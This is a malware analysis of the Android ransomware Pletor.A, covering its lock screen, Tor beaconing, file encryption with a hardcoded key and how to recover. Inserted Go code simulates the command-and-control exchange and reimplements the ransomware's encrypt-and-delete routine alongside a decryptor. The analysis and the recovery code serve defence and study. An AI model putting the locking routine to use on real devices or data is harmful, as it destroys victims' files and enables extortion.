Android/Pletor.A!tr
Analysis
Android/Pletor.A!tr is a piece of ransomware targeting Android mobile phones.
The application was named "Sex xonix" in the sample analyzed. When launched, it hinders usage of the phone: the user sees a lock screen in Russian stating that the phone was locked "for viewing and distribution [of] child pornography, bestiality and other perversions." To regain control of the phone and its data, the user is asked to pay either
- 260 Ukrainian Hryvnia (roughly 15 Euros at the time), the amount stated on the lock screen, via a service called MoneXy, OR
- 1000 rubles via QIWI VISA WALLET.
Technical Details
The main application is called "Sex xonix" or "Shadow Fight 2" and ships in the package "org.simplelocker".
Fig1 : Application Icon
When the application is launched, the phone is 'locked' and the user sees the ransom message shown in the figures below.
Fig2 : Lock Screen Message
Fig3 : Lock Screen Message
This roughly translates to:
WARNING, your phone is locked! The device has been locked for viewing and distributing child pornography, bestiality and other perversions. To unlock it you need to pay 260 UAH. 1. Find the nearest top-up terminal. 2. Select MoneXy. 3. Enter 380982049193. 4. Deposit 260 hryvnia and then pay. Do not forget to take the receipt! After the payment is received, your device will be unlocked within 24 hours. IN CASE OF NON-PAYMENT YOU WILL LOSE ALL DATA ON your device FOREVER!
The malware prevents any usage of the phone beyond this point: any key event on the phone results in the above lock screen being displayed again.
Next, it sends a heartbeat message to the server http://xe[REMOVED]xs.onion/ over Tor, through a local SOCKS proxy on port 9050 (Tor's default SOCKS port).
These messages are sent every 3 seconds and contain a JSON object with the following values:
- "type": "locker check"
- "device id": [first 10 digits of the device's IMEI number]
- "client number": "19"
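The beacon and command exchange described above, as an added example in Go (this is illustrative code, not the sample's own code or Fortinet's): it serialises the "locker check" object with the key names listed, runs a loopback stand-in for the .onion server, and ends the client loop as soon as the server answers "command": "stop", which is the unlock path the analysis documents. Tor and the SOCKS proxy on port 9050 are left out, the 3-second interval is shortened to 10 ms for the demo, and newline-delimited JSON framing and the sample IMEI are assumptions.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"net"
	"time"
)

// Heartbeat uses the JSON key names the page lists for the "locker check"
// message. Struct and helpers are illustrative, not the malware's own code.
type Heartbeat struct {
	Type         string `json:"type"`
	DeviceID     string `json:"device id"`
	ClientNumber string `json:"client number"`
}

// deviceID returns the first 10 digits of the IMEI, as the page describes.
func deviceID(imei string) string {
	if len(imei) > 10 {
		return imei[:10]
	}
	return imei
}

// buildHeartbeat serialises one beacon for the given IMEI.
func buildHeartbeat(imei string) ([]byte, error) {
	return json.Marshal(Heartbeat{"locker check", deviceID(imei), "19"})
}

// parseCommand extracts "command" from a server reply ("" if absent).
func parseCommand(reply []byte) (string, error) {
	var c struct {
		Command string `json:"command"`
	}
	err := json.Unmarshal(reply, &c)
	return c.Command, err
}

// fakeC2 stands in for the .onion server: it acknowledges beacons with {} and
// answers the stopAfter-th one with {"command":"stop"}. One newline-terminated
// JSON object per message is an assumption; the page does not give the framing.
func fakeC2(ln net.Listener, stopAfter int) {
	conn, err := ln.Accept()
	if err != nil {
		return
	}
	defer conn.Close()
	r := bufio.NewReader(conn)
	for n := 1; ; n++ {
		if _, err := r.ReadBytes('\n'); err != nil {
			return
		}
		reply := "{}\n"
		if n >= stopAfter {
			reply = `{"command":"stop"}` + "\n"
		}
		if _, err := conn.Write([]byte(reply)); err != nil || n >= stopAfter {
			return
		}
	}
}

// runLocker is the client side: send a beacon every interval (3 s in the
// sample) until the server says "stop". Returns the number of beacons sent.
func runLocker(addr, imei string, interval time.Duration) (int, error) {
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		return 0, err
	}
	defer conn.Close()
	r := bufio.NewReader(conn)
	for sent := 0; ; {
		msg, err := buildHeartbeat(imei)
		if err != nil {
			return sent, err
		}
		if _, err := conn.Write(append(msg, '\n')); err != nil {
			return sent, err
		}
		sent++
		reply, err := r.ReadBytes('\n')
		if err != nil {
			return sent, err
		}
		if cmd, err := parseCommand(reply); err != nil {
			return sent, err
		} else if cmd == "stop" {
			return sent, nil
		}
		time.Sleep(interval)
	}
}

// simulate runs both sides on loopback with a constructed IMEI and returns
// how many beacons were sent before "stop" arrived.
func simulate(stopAfter int) (int, error) {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return 0, err
	}
	defer ln.Close()
	go fakeC2(ln, stopAfter)
	return runLocker(ln.Addr().String(), "356938035643809", 10*time.Millisecond)
}

func main() {
	n, err := simulate(3)
	fmt.Println("beacons before stop:", n, "err:", err)
}
```

The point of the server half is that whoever answers the beacon endpoint controls the unlock: a responder who can route the sample's Tor traffic to an emulated server can return "stop" instead of waiting for the operators.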
Finally, the malware looks for files on the phone with the extensions
"jpeg", "jpg", "png", "bmp", "gif", "pdf", "doc", "docx", "txt", "avi", "mkv", "3gp", "mp4" and AES-encrypts them with a key hardcoded in the package. Because the key is embedded in the application rather than generated per device, the encrypted files can be recovered by anyone who extracts it from the APK.
The encrypted files are saved with the extension .enc and the original files are deleted.
The malware can be 'disabled' and the files decrypted when the server mentioned above responds with a JSON object containing
"command": "stop"
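As an added example (not the sample's code or Fortinet's), the following Go program reproduces the file handling described above on constructed sample files in a temporary directory and pairs it with the recovery routine a responder would run: because the key is hardcoded in the APK, decryption does not depend on the server ever answering "stop". Everything beyond "AES with a hardcoded key" is an assumption here: CBC mode, a zero IV, PKCS#7 padding and the placeholder key demoKey. A real tool takes the key extracted from the package, and the mode and IV must be confirmed against the APK before running it on a victim's data (and then only on copies).

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// targetExts is the extension list from the analysis above.
var targetExts = map[string]bool{"jpeg": true, "jpg": true, "png": true, "bmp": true, "gif": true, "pdf": true,
	"doc": true, "docx": true, "txt": true, "avi": true, "mkv": true, "3gp": true, "mp4": true}

// demoKey is a placeholder (assumption): the page says the key is hardcoded in
// the package but does not reproduce it. AES-CBC, zero IV and PKCS#7 padding
// are assumptions too; the page only says "AES".
var demoKey = []byte("0123456789abcdef")

// isTarget reports whether name carries one of the targeted extensions.
func isTarget(name string) bool {
	return targetExts[strings.TrimPrefix(strings.ToLower(filepath.Ext(name)), ".")]
}

// aesCBC pads and encrypts, or decrypts and unpads, data under key.
func aesCBC(key, data []byte, encrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	iv := make([]byte, bs) // zero IV (assumption)
	if encrypt {
		n := bs - len(data)%bs
		data = append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
		out := make([]byte, len(data))
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, data)
		return out, nil
	}
	if len(data) == 0 || len(data)%bs != 0 {
		return nil, errors.New("ciphertext not block-aligned")
	}
	out := make([]byte, len(data))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, data)
	n := int(out[len(out)-1])
	if n == 0 || n > bs || !bytes.Equal(out[len(out)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding: wrong key or corrupt file")
	}
	return out[:len(out)-n], nil
}

// transform walks root; each file pick accepts goes through aesCBC, is written
// to rename(path), and the source is deleted (originals are removed, per the page).
func transform(root string, key []byte, encrypt bool, pick func(string) bool, rename func(string) string) ([]string, error) {
	var written []string
	err := filepath.Walk(root, func(p string, info os.FileInfo, err error) error {
		if err != nil || info.IsDir() || !pick(p) {
			return err
		}
		in, err := os.ReadFile(p)
		if err != nil {
			return err
		}
		out, err := aesCBC(key, in, encrypt)
		if err != nil {
			return fmt.Errorf("%s: %w", p, err)
		}
		dst := rename(p)
		if err := os.WriteFile(dst, out, 0o600); err != nil {
			return err
		}
		written = append(written, dst)
		return os.Remove(p)
	})
	return written, err
}

// lockDir reproduces the described behaviour: targeted files become <name>.enc.
func lockDir(root string, key []byte) ([]string, error) {
	return transform(root, key, true, isTarget, func(p string) string { return p + ".enc" })
}

// recoverDir is the defender's side: with the key extracted from the APK, every
// .enc file is decrypted back in place, no C2 "stop" command required.
func recoverDir(root string, key []byte) ([]string, error) {
	return transform(root, key, false,
		func(p string) bool { return strings.HasSuffix(p, ".enc") },
		func(p string) string { return strings.TrimSuffix(p, ".enc") })
}

func main() {
	dir, _ := os.MkdirTemp("", "pletor")
	defer os.RemoveAll(dir)
	os.WriteFile(filepath.Join(dir, "photo.jpg"), []byte("constructed sample bytes"), 0o600)
	fmt.Println(lockDir(dir, demoKey))
	fmt.Println(recoverDir(dir, demoKey))
}
```

recoverDir refuses files whose padding does not check out, which is what a wrong key or a truncated .enc file looks like, so it will not silently overwrite a ciphertext with garbage.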
Permissions required by the application:
- INTERNET
- ACCESS_NETWORK_STATE
- READ_PHONE_STATE
- RECEIVE_BOOT_COMPLETED
- WAKE_LOCK
- WRITE_EXTERNAL_STORAGE
- READ_EXTERNAL_STORAGE
Aimed at Ukrainian and Russian users.
Certificate information:
- Owner: CN=Android Debug, O=Android, C=US
- Issuer: CN=Android Debug, O=Android, C=US
- Serial number: 40e8512f
- Valid from: Mon May 12 12:45:55 CEST 2014 until: Wed May 04 12:45:55 CEST 2044
This distinguished name is the one the Android SDK generates for its default debug keystore, so the sample was signed with a debug key rather than a developer's release key.
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability

Product | Signature database
---|---
FortiGate | Extreme
FortiClient | Extended
FortiMail | Extended
FortiSandbox | Extended
FortiWeb | Extended
Web Application Firewall | Extended
FortiIsolator | Extended
FortiDeceptor | Extended
FortiEDR |